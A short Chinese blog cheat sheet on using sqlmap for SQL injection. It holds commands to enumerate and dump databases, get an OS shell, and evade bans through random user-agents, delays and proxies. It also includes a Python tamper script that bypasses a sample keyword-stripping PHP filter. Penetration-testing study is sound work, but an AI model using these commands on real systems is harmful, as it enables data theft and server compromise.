sqlmap

2021-02-04

Word count: 493 | Reading time≈ 2 min

sqlmap的常见使用方式

需要python环境

sql注入

常见指令:

-u 指定url
--dbs 获得数据库
--tables 获得表
--columns 获得字段
--dump 枚举所有数据
-D 库名 -T 表名 - C 字段
--forms 让sqlmap自己寻找页面表单

为了防止被ban，还需下面操作
--count 查询数据量
--random-agent 构造随机user-agent
--delay=2 延迟2秒
--level 1-5（默认为1，低等级，如果跑不出来可以加高等级）
--tamper xxxxx.py 调用tamper脚本

1	sqlmap -u "https:xxxx.com?id=1" --dbs --count

--is-dba 查看权限是否为root，如果显示DBA为TRUE 可以尝试直接webshell
--os-shell 尝试拿shell
--batch 不询问输入，全部默认确定
-v 显示详细的输出等级（-v 3 会显示Payload）

代理：

1	–proxy http://192.168.1.1:xxxx

1
2
3

–proxy-file：加载代理ip列表

–proxy-file=xxx.txt

`--fresh-queries`

不会从缓存里面加载

1	python sqlmap.py -u "xxxxx" --proxy=http://127.0.0.1:10809 --is-dba --level 5

tamper

使用：--tamper=xxxx.py

环境：

function sqlwaf( $str ) {

	$str = str_ireplace( "and", "", $str );

	$str = str_ireplace( "or", "", $str );

	$str = str_ireplace( "union", "", $str );

	$str = str_ireplace( "select", "", $str );

	$str = str_ireplace( "sleep", "", $str );

	$str = str_ireplace( "group", "", $str );

	$str = str_ireplace( "extractvalue", "", $str );

	$str = str_ireplace( "updatexml", "", $str );

	$str = str_ireplace( "PROCEDURE", "", $str );

	return $str;

}

tamper脚本编写：xxxx.py （关键词替换）


# sqlmap/tamper/escapequotes.py
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.NORMAL              #__priority__指定了tamper脚本的优先级
 
def dependencies():
    pass
 
def tamper(payload, **kwargs):
    if payload:
        result = payload.replace("OR", "oorr").replace("AND", "aandnd").replace("UNION", "ununionion").replace("SELECT", "seleselectct").replace("PROCEDURE", "PROCEPROCEDUREURE").replace("SLEEP", "slesleepep").replace("GROUP", "grogroupup").replace("EXTRACTVALUE", "extractvextractvaluealue").replace("UPDATEXML", "updatupdatexmlexml")
        return result

固定格式：


import xxx             #根据需求

from lib.core.enums import PRIORITY
__priority__ = PRIORITY.NORMAL 

def tamper(payload, **kwargs):
	if payload:
		xxxxx
		xxxxx
		xxxxx
		result=xxxxx
		
		return result